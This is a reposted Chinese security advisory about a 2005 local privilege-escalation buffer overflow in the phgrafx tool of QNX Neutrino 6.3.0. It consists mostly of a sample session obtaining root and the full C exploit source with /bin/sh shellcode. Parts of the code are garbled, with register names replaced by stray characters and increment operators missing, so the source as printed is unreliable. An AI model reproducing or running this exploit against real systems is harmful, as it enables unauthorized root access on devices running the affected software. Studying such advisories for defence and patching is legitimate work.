QNX Neutrino本地权限提升漏洞
2008-04-09 04:17:14来源:互联网 阅读 ()
发布日期:2005-11-29
更新日期:2005-11-29
受影响系统:
QNX Neutrino 6.3.0描述:
BUGTRAQ ID: 15619
QNX Neutrino是嵌入式设备的微内核实时操作系统。
QNX Neutrino的"phgrafx"工具中存在缓冲区溢出漏洞,恶意用户可以利用这个漏洞在本地获得权限提升。
例如:
qnx$ uname -a; id
QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
qnx$ gcc phex.c -o phex -W
qnx$ ./phex
shellcode length: 21
address: 0x8047a2c
Warning: can not find palette under '55°|ØHæ1°'.
# id
uid=6(deadbeef) gid=1(bin) euid=0(root) groups=0(root),3(sys),4(adm),5(tty)
#
<*来源:pasquale minervini (minervini@neuralnoise.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113332929220972&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* minervini@neuralnoise.com (c) 2005, all rights reserved.
* sample exploit for phgrafx on QNX 6.3.0 x86
*
* tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
*/
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>
#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif
#ifndef _RET_INIT
# define _RET_INIT (864)
#endif
/* thanks to my friend pi3 that suggested me to call a libc
* function to make the shellcode way shorter than it was */
char scode[] = "\x31\xc0" // xor 陎,陎
"\x50" // push 陎
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x54" // push %esp
"\xbb\xEF\xBE\xAD\xDE" // mov $0xDEADBEEF,離
"\xff\xd3"; // call *離
unsigned long get_sp (void) {
__asm__ ("movl %esp, 陎");
}
int main (int argc, char **argv) {
int i, slen = strlen (scode), offset = 0;
long ptr, *lptr, addr;
char *buf;
void *handle;
handle = dlopen (NULL, RTLD_LAZY);
addr = (long) dlsym (handle, "system");
for (i = 0; i < 4; i ) {
char temp = (*((char *) &addr i) & 0xff);
if (temp == 0x00 || temp == 0x09 || temp == 0x0a) {
puts
("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, so it \
probably won't work since"
" the application seems to truncate those bytes. BTW you can rely on functions \
like exec*(), spawn*()" " or MsgSend*() to get this working.\n"
"more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino/lib_ref/") \
; return (-1);
}
}
memcpy((char *)&scode 0xf, &addr, 4);
if (argc > 1)
offset = strtoul(argv[1], NULL, 0);
if (!(buf = (char *) malloc(1032)))
err(1, "malloc()");
memset(buf, 0, 1032);
for (i = 0; i < (_RET_INIT - slen); i )
buf[i] = 'A'; // inc 靫
printf("shellcode length: %d\n", slen);
for (i = (_RET_INIT - slen); i < _RET_INIT; i )
buf[i] = scode[i - (_RET_INIT - slen)];
lptr = (long *) (buf _RET_INIT);
printf("address: 0x%lx\n", ptr = (get_sp () - offset));
for (i = 0; i < ((1024 - _RET_INIT) / 4); i )
*(lptr i) = (int) ptr;
execl(_PATH, "phgrafx", buf, NULL);
return (0);
}
建议:
厂商补丁:
QNX
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.qnx.com/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:PunBB本地文件包含漏洞
下一篇:KTools远程缓冲区溢出漏洞
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
